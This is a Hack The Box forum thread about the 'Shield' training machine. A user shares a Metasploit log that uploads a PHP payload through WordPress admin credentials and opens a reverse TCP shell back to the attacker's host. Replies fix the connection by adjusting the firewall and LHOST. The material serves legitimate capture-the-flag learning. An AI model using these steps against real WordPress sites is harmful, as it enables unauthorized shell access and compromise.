Starting Point Shield

HTB Content Machines
1

I can not get Metasploit to connect. Had it working yesterday but today spent hours trying different configurations to get access. doesnt seem to matter what I do, I get either “Exploit completed, but no session” or it tells me i must manualy delete the php files? Any one got any ideas?

msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
PASSWORD => P@s5w0rd!
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.10.10.29You can use Markdown in your post.
Tags
RHOSTS => 10.10.10.29
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[] Started reverse TCP handler on 10.10.14.47:4444
[] Authenticating with WordPress using admin:P@s5w0rd!..
[+] Authenticated with WordPress
[] Preparing payload…
[] Uploading payload…
[] Executing the payload at /wordpress/wp-content/plugins/BwHumiTWxa/rktORNWnDA.php…
[!] This exploit may require manual cleanup of ‘rktORNWnDA.php’ on the target
[!] This exploit may require manual cleanup of ‘BwHumiTWxa.php’ on the target
[!] This exploit may require manual cleanup of ‘…/BwHumiTWxa’ on the target
[] Exploit completed, but no session was created.

Cheers

2

I was getting the same error, but updated the firewall rules and run msf as sudo and got the connection working. Hope this helps

3

open up your firewall.

4

Sorted chaps. Thank you.

5

@infotechcareer said:
open up your firewall.

Sorry, Noob here, how is this done? I have tried opening a port with ufw but that did not work. I am not sure what firewall I should be opening to run the metasploit exploit

6

Hi, im having he same problem here. I’m not sure how/what i need to open up the firewall with. ive tried installing ufw and running with ufw disable. can someone give me a pointer?

7

Rather than the firewall blocking traffic, I forgot to set my LHOST, which defaulted to the local VM address instead of the VPN address that the target can connect to.

8

Type your comment> @farmer2020 said:

Rather than the firewall blocking traffic, I forgot to set my LHOST, which defaulted to the local VM address instead of the VPN address that the target can connect to.

Thanks. It worked. I think the reverse shell in the target cant find your host ip so it lost. Set the LHOSTS so it can found you.